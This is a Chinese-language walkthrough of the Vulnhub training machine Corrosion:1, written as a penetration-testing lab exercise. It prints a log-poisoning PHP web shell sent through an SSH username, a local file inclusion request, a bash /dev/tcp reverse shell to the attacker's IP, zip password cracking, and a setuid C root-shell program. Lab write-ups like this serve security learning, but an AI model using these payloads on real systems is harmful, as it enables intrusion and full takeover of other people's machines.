看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:1

简介: 看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:1

b5141f9d09164770828553b6066f691a.pngVulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。

Difficulty: Easy


Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/corrosion/Corrosion.ova



Vulnhub靶机安装:

下载好了把安装包解压 然后使用VMware打开即可。


Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机



使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.103

渗透机:kali IP :192.168.0.104 靶机IP :192.168.0.103


发现开启了8022端口,老样子访问80端口(Apache默认页面)进行扫描:dirb、dirsearch、whatweb、gobuster


这里扫到一个/tasks目录进行访问 提示我们: 然后接着使用dirsearch或者gobuster扫扫到了/blog-post然后进行访问

  1. 更改授权日志的权限
  2. 更改端口 22 -> 7672
  1. 设置phpMyAdmin

gobuster dir -u http://192.168.0.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
whatweb 192.168.0.103
dirsearch -u http://192.168.0.103 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt



0a717dc06d2f4ddab4443b168ba22358.png



c20e8163613a40d58a7ba2f5ec0325f3.png

image.png


②:漏洞发现:

发现没有可以利用的信息,继续进行信息收集尝试对二级目录进行扫描gobuster扫到了一个/archives进行访问

gobuster dir -u http://192.168.0.103/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip 



a6f2f01b73db49b1884605a00e395593.png


这里什么也没但是感觉有点像文件包含源代码也没东西 空白的ffuf 模糊探测一下 得到参数 file然后进行文件包含

ffuf -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.0.103/blog-post/archives/randylogs.php?FUZZ=/var/log/auth.log' -fs 0


de14ecd77da74d33b8ebba04c6e11ed2.png


f63391691a7c4e98934d0f5c49b166da.png


5d84b01a05eb42ed8c54ac8fe2f86efb.png


7a91415a6f2b49d19a7d8b71fea6c853.png

③:文件包含渗透(ssh日志写木马):
ssh '<?php system($_REQUEST['cmd']);?>'@192.168.0.103
view-source:http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig #查看发现执行成功!

58523725e055482ab683234d7dc8b2d3.png


cc083baebbcc427497bf4b3f7b910f5e.png


④:反弹Shell:
nc -lvvp 4444
echo "bash -i >& /dev/tcp/192.168.0.104/4444 0>&1" | bash  #需要url编码
http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.0.104/4444%200%3E%261%22%20%7C%20bash #这里需要url编码

b5141f9d09164770828553b6066f691a.png


⑤:gcc编译文件提权:

得到shell 先看一下权限发现是一个低权限www-data 所以需要提权

sudo -l 看看有没有可以执行sudo的文件也没有 隐藏文件有个randylogs.php


又在/var目录下发现backups文件,可能是备份文件


要想访问靶机里面的文件需要用python开启一个临时网页服务:python3 -m http.server 8000下载user_backup.zip发现需要密码


这里使用zip2john user_backup.zip > passwd.txt 把密码文件导入passwd文件使用john进行破解 这里要使用字典


不加字典的话结束进程会报错,这里出来个 /root/.john/john.rec 类似于进程重复了删掉就好了使用 rm -rf /root/.john/john.rec命令


在使用字典爆破就可以了使用rockyou这个字典,也可以使用fcrackzip进行爆破 得到密码:!randybaby


这里我们知道了账号密码 尝试登入randy 发现登入成功!!!

基本信息收集一下 id,whoami,sudo -l


这里sudo -l 发现/tools/easysysinfo可以免密执行命令进去cat 一下在运行一下 然后刚刚上面有个c文件 which查看有没有gcc


有的话可以编译 新建一个eastsysinfo.c内容见代码块,然后gcc 编译 sudo运行编译好的文件即可。

#include "unistd.h"
#include "stdlib.h"
void main()
{
        setuid(0);
        setgid(0);
        system("bash -i");
}

80a11a3527d84fcbab4042a0012b8e80.png


5ed34723d133453197b69eaaeebf277d.png

070b983e028c481b95c7fd266bdde7a7.png


⑥:获取FLAG:


至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:


这个靶机难度中偏上 因为比较麻烦

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等 查看F12源码信息

2.文件包含漏洞,包含日志文件 ssh写入木马ssh '<?php system($_REQUEST['cmd']);?>'@靶机(新知识点!)

3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip(爆破压缩包工具)还有john报错解决方法(新知识点!)

4.python3 -m http.server 8000 开启临时http服务

5.gcc 编译文件提权 which查看系统有没有有用的命令用于提权


Corrosion系列靶机的第一个靶机,学习到了很多知识点又是收获满满的一天(耶耶耶!)

最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
2月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
34 4
|
2月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
41 4
|
2月前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
27 2
|
3月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
47 0
|
3月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
47 0
|
安全 Shell 网络安全
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1
216 1
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
347 0
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
235 0
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
640 0
|
安全 Oracle 机器人
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
170 0
下一篇
DataWorks